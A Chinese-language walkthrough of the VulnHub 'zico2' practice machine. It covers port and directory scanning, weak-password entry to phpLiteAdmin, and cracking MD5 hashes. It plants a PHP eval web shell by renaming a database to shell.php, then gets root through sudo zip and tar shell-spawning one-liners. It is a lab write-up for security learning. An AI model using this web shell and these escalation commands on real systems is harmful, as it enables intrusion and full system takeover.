zico2打靶记录

一、环境搭建

下载地址:https://download.vulnhub.com/zico/zico2.ova

直接双击下载的.ova文件即可在VMware中打开

设置好保存路径后在虚拟机的设置中删除仅主机这个网卡

然后启动靶机

二、信息收集

扫描靶机ip

复制代码
arp-scan -l

扫描一下开放的端口

复制代码
nmap -p- -sV -A 192.168.228.129

可以看到一共开放了22,80,111端口

扫描下目录

复制代码
dirb http://192.168.228.129

访问网站

寻找功能点

测试发现一个文件包含点

再查看网站的目录

里面只有一个php文件点击访问看看

看起来确实是一个叫做phpLiteAdmin的登陆界面,简单试试弱口令发现admin登陆成功

应该是一个数据库管理后台,一番寻找后在这里找到了数据

发现了root和zico的用户名和密码,但密码是被加密了,看一下密码的特征是32位长度的16进制字符串,很明显是md5加密,去网上破解一下试试

root用户的密码是34kroot34

zico用户的密码是zico2215@

ssh连接发现都无法连接、

三、Getshell

我们回到phpLiteAdmin管理页面,既然已经拿到数据库后台,是否可以直接写入一句话木马进而getshell呢?

首先随便创建一个数据库名字叫做shell_db

然后在该库中创建一个名为shell_table的表,后面的字段数无所谓

随便设置一个字段名称,我这里设为shell,类型为text

点击insert

写入我们的一句话木马

复制代码
<?php phpinfo();@eval($_POST['cmd']);?>

写入成功

完成后我们还无法访问这个一句话木马,因为数据库文件的默认存放位置是 /usr/databases/,在该目录中的文件是无法直接访问到的,所以我们需要通过改名来移动文件到可以访问的位置。

这里看到原来的位置为 /usr/databases/shell_db ,这里需要把绝对路径改为相对路径,也就是网站的根目录下,我们直接改为 shell.php。

然后再次访问http://192.168.228.129/dbadmin/ ,发现此时多了我们创建的shell.php这个文件

点击这个文件发现木马上传成功

然后就可以使用蚁剑连接

成功Getshell

四、权限提升

可以读取文件后,我们去找找有没有泄露的敏感信息,最终在 /home/zico/wordpress/wp-config.php,这个文件中找到了 zico 用户的ssh密码 sWfCsfJSPV9H3AmQzw8

尝试登陆,发现成功

复制代码
ssh zico@192.168.228.129
sWfCsfJSPV9H3AmQzw8

发现可以sudo提权

复制代码
sudo -l

这里发现可以执行root权限的有tar和zip

zip提权

复制代码
sudo zip /tmp/1.zip /home/zico/to_do.txt -T --unzip-command="sh -c /bin/bash"

tar提权

复制代码
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

提权成功

相关推荐
white-persist3 小时前
XXE 注入漏洞全解析:从原理到实战
开发语言·前端·网络·安全·web安全·网络安全·信息可视化
lingggggaaaa6 小时前
小迪安全学习笔记(一百零二讲)—— 漏扫项目篇&PoC开发&Yaml语法&插件一键生成&匹配结果&交互提取
笔记·学习·安全·网络安全·交互
谈不譚网安1 天前
Raven2
web安全·网络安全
网安INF1 天前
网络攻防技术:网络安全攻击概述
安全·web安全·网络安全·网络攻防
emma羊羊1 天前
【文件读写】18,21关
网络安全·upload
电子科技圈2 天前
芯科科技第三代无线SoC现已全面供货
嵌入式硬件·mcu·物联网·网络安全·智能家居·智能硬件·iot
Bruce_Liuxiaowei3 天前
内网连通性判断:多协议检测方法与应用
运维·安全·网络安全
emma羊羊3 天前
【文件读写】图片木马
linux·运维·服务器·网络安全·靶场
介一安全3 天前
资产信息收集与指纹识别:HTTPX联动工具实战指南
网络安全·安全性测试·httpx·安全工具
unable code4 天前
攻防世界-Web-easyupload
网络安全·web·ctf